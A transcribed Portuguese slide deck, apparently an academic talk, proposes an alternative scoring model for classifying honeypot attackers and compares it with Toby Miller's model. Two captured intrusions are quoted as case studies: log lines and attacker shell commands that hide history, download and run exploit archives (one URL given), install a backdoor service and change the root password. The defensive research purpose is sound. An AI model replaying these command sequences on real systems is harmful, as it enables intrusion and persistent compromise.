Um Modelo Alternativo Baseado em Honeynet para Identificação e Classificação de Atacantes. Alexandre Pinaffi Andrucioli

Transcrição

1 Um Modelo Alternativo Baseado em Honeynet para Identificação e Classificação de Atacantes Alexandre Pinaffi Andrucioli pinaffi@ravel.ufrj.br

2 Motivação Estudar os ataques gerados na Internet Entender os principais objetivos de um atacante Motivação Técnicas de ataque e invasão Passos realizados Identificar o perfil e risco de um atacante

3 Objetivos Construção de um ambiente para captura dos dados de ataque Análise dos ataques sofridos Estudo do modelo para identificação de atacantes, criado por Toby Miller Identificação de falhas no modelo original Proposta de soluções para as falhas identificadas Avaliação e comparação do modelos

4 Ambiente Construído Honeynet Honeypots com alto nível de envolvimento Serviços e sistemas reais Rede dedicada à captura de informações Diferentes sistemas operacionais Rede construída não é divulgada Dados capturados, em geral, pertencem a algum tipo de ataque

5 Ambiente Construído Honeynet (Geração I) Controle e captura de dados Honeynet (Geração II) Utilizada no trabalho Introduz novos conceitos para controle e captura Limite de conexões Utilização de IPS Bridges Controle de log outros

6 Ambiente Construído

7 Modelo Original Criado por Toby Miller Rating the Enemy: How to Identify the Enemy. Analisa 5 categorias de um ataque Sistema Operacional Reconhecimento Ataque Ferramentas Utilizadas Endereço IP de Destino

8 Modelo Original Classifica o atacante em relação ao nível de conhecimento e riscos apresentados: Script Kiddie Usuário Comum Usuário Médio Administrador de Sistemas Atacante Profissional

9 Modelo Original Apresenta algumas falhas ao analisar o ataque: Não considera ataques gerados a partir da máquina invadida Considera o SO destino ao atribuir pontuação Desconsidera a investigação da máquina após uma invasão Desconsidera a limpeza de logs na máquina invadida Desconsidera reconhecimentos por Banner e engenharia social

10 Modelo Original Desconsidera ataques de engenharia social (senhas roubadas) Desconsidera o uso de técnicas manuais Desconsidera o emprego de ferramentas pessoais Desconsidera o reconhecimento realizado por uma máquina diferente daquela que executa o ataque Outros

11 Modelo Alternativo Criado com o objetivo de contornar os problemas encontrados Acrescenta novos questionários e pontuação, em busca de dados mais precisos e coerentes ao ataque Mantém a estrutura básica do modelo original Cinco categorias analisadas Mantém a mesma classificação do atacante

12 Modelo Alternativo Classificação de Sistemas Operacionais S1 S2 S3 S S5 S6 S7 S8 ST Sistema Operacional Windows 9x ME Windows NT XP Solaris AIX MAC HP-UX Linux BSD Total da Categoria Pontuação (1 5)

13 Modelo Alternativo Classificação por tipo de Reconhecimento Tipo Pontuação R1 R2 R3 R R5 R6 R7 R8 SYN (<=0Bytes) SYN FIN X-mas tree SYN FIN TCP Connect RST UDP

14 Modelo Alternativo Classificação por tipo de Reconhecimento (Cont.) Tipo Pontuação R9 ICMP 2 R10 R11 R12 R13 R1 RT Banner Engenharia Social Outros Rec. De Múltiplas Máquinas/Portas Rec. realizado por diferente máquina Total da Categoria (0 6)

15 Modelo Alternativo Classificação de Ataques A1 A2 A3 A A5 A6 A7 A8 A9 A10 AT Tipo Ataque aplicável ao SO Novo ataque Ataque comum (conhecido) Ataque bem sucedido Ataque modificado Máquina mal configurada Ataque de Eng. Social Ataque de múltiplas máquinas Ataque de worm Não se tornou super-usuário Total da Categoria Pontuação Sim=3,Não= Não= (-1 23)

16 Modelo Alternativo Classificação de Ferramentas Utilizadas F1 F2 F3 F F5 F6 F7 F8 F9 F10 F11 FT Tipo Rootkit Binário LKM LKM avançado Rootkit Windows Rootkit bem sucedido Utilização de técnicas manuais Ferramentas pessoais Investigação da máquina invadida Limpeza de registros Proteção da máquina invadida Instalação de novos serviços Total da Categoria Pontuação Não= Sim=3,Não=-1 Sim=3,Não= (-2 25)

17 Modelo Alternativo Classificação para Endereço IP de Destino E1 E2 E3 E E5 E6 E7 Sistema Operacional Máquina ligada Sofre ataque (D)DoS Sofre ataque de pichamento Disponibilização de serviços Outros Computador sem dados críticos Informações Pessoais Documentos Pontuação 1 3 Sim=,Não=-1

18 Modelo Alternativo Classificação para Endereço IP de Destino (cont.) E8 E9 E10 Sistema Operacional Dados de cartão de crédito Informações bancárias Info. financeiras e pessoais Informações críticas Pontuação Sim=,Não=-1 Sim=,Não=-1 Sim=,Não=-1 E11 E12 E13 E1 Dados de interesse nacional Dados empresariais Informações de rede Máquina gera novos ataques Sim=8,Não=-1 Sim=6,Não=-1 Sim=,Não=-1

19 Modelo Alternativo Classificação para Endereço IP de Destino (cont.) E15 E16 E17 E18 E19 E20 E21 Sistema Operacional Gera ataques (D)DoS Gera ataque de pichamento Disponibilização de serviços Outros Computador sem dados críticos Informações Pessoais Documentos Dados de cartão de crédito Pontuação 3

20 Modelo Alternativo Classificação para Endereço IP de Destino (cont.) E22 E23 E2 E25 E26 ST Sistema Operacional Informações bancárias Info. financeiras e pessoais Informações críticas Dados de interesse nacional Dados empresariais Informações de rede Total da Categoria Pontuação 8 6 ( )

21 Modelo Alternativo Classificação de atacantes Pontuação Acima de 85 Classificação Script Kiddie Usuário Básico Usuário Médio Administrador de Sistemas Atacante Profissional

22 Análise de Ataque (1) Reconhecimento Sep 17 18:08:51 ravel Kernel: INBOUND TCP: IN=br0 OUT=br0 PHYSIN=eth1 PHYSOUT=eth2 SRC=IPATAQUE DST=HONEYPOT5 LEN=60 TOS=0x00 PREC=0x00 TTL= ID=3103 DF PROTO=TCP SPT=3197 DPT=3 WINDOW=580 RES=0x00 SYN URGP=0 Invasão (CAN ) bash-2.05a$ unset HISTFILE; uname -a; id; w;uid=8(apache) gid=8(apache) groups=8(apache) Download e execução de um exploit: bash-2.05a$ wget bash-2.05a$ tar zxf rh73.tgz bash-2.05a$./rh73 [+] Attached to 068 [+] Signal caught [+] Shellcode placed at 0x000fd1d [+] Now wait for suid shell... unset HISTFILE

23 Análise de Ataque (1) Instalação de um IRC Bouncer wget geocities.com/bogdanul_16/linuz/psybnc.tgz tar zxf psybnc.tgz cd psybnc./psybnc.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.,----.,----.,-.,-.,---.,--.,-.,----. O,-' \ \/ / o \,--' _/ _\ \ \ / o< \ _ / _ \_ \ Version (c) the most psychoid and the cool lam3rz Group IRCnet

24 Análise de Ataque (1) Miller: 13 pontos - Usuário Básico SO: 3 (Linux->Linux) Reconhecimento: 3 pontos Ataque: 2 pontos Ferramentas Utilizadas: 0 pontos Endereço IP de destino: 5 pontos

25 Análise de Ataque (1) Modelo Alternativo: 23 pontos Script Kiddie SO: 5 pontos (S7) Reconhecimento: 2 pontos (R12-R13) Ataque: 9 pontos (A1+A3+A) Ferramentas Utilizadas: -2 pontos (-F8-F9) Endereço IP de destino: 9 pontos (E1+E+E6)

26 Reconhecimento Análise de Ataque (2) Sep 19 11:03:16 ravel Kernel: INBOUND TCP: IN=br0 OUT=br0 PHYSIN=eth1 PHYSOUT=eth2 SRC=IPATAQUE1 DST=HONEYPOT5 LEN=52 TOS=0x00 PREC=0x00 TTL= ID=859 DF PROTO=TCP SPT=36327 DPT=3 WINDOW=580 RES=0x00 SYN URGP=0 Invasão (CAN ) bash-2.05a$ unset HISTFILE; uname -a; id; w;uid=8(apache) gid=8(apache) groups=8(apache) Download e execução de um serviço novo para realizar o login na máquina (é instalado um serviço como o telnet na porta 8081): bash-2.05a$ wget bash-2.05a$ chmod +x ssh bash-2.05a$./ssh Daemon is starting...ok, pid = 173

27 Análise de Ataque (2) Atacante volta pela porta 8081, se torna super-usuário, altera a senha de root da máquina e a vasculha: sh-2.05a$ wget sh-2.05a$ tar -xzvf p.tgz sh-2.05a$./p [+] Attached to 1761 [+] Signal caught [+] Shellcode placed at 0x000fd1d [+] Now wait for suid shell... sh-2.05a# sh-2.05a# passwd root sh-2.05a# cd /var/tmp sh-2.05a# ls...

28 Análise de Ataque (2) Atacante realiza o download de uma ferramenta e passa a gerar ataques [root\@fedora root]# wget [root\@fedora root]# tar -zxvf selena.tgz [root\@fedora root]#./assl Outras tentativas de ataque são realizadas, porém todas barradas pelo sistema de controle da Honeynet Ocorreram tentativas de download de outras ferramentas, porém sem sucesso

29 Análise de Ataque (2) Miller: 13 pontos - Usuário Básico SO: 3 (Linux->Linux) Reconhecimento: 3 pontos Ataque: 2 pontos Ferramentas Utilizadas: 0 pontos Endereço IP de destino: 5 pontos

30 Análise de Ataque (2) Modelo Alternativo: 30 pontos - Usuário Básico SO: 5 pontos (S7) Reconhecimento: 2 pontos (R12-R13) Ataque: 9 pontos (A1+A3+A) Ferramentas Utilizadas: pontos (+F8-F9+F11) Endereço IP de destino: 12 pontos (E1+E5+E6+E1)

31 Comparação entre os modelos O modelo criado por Miller pontua igualmente os dois ataques, apesar da grande diferença Desconsidera pontos importantes como ataques realizados através da máquina invadida O modelo alternativo demonstra mais coerência com os tipos de ataques sofridos Avalia todos os passos anteriores e posteriores a invasão

32 Comparação entre os modelos Considera ataques realizados pela máquina invadida Considera outras ações, como a troca de senhas Nos testes apresentados, assim como outros realizados, o modelo alternativo apresenta maior precisão a medida que o ataque se torna mais complexo Mantém uma classificação idêntica ao modelo em ataques muito simples

33 Conclusão O modelo alternativo atinge o objetivo esperado: Mantém os conceitos originais introduzidos por Miller Ataca os problemas levantados em relação ao modelo original Adiciona ao modelo novas avaliações Permite um análise mais detalhada do atacante, assim como a sua classificação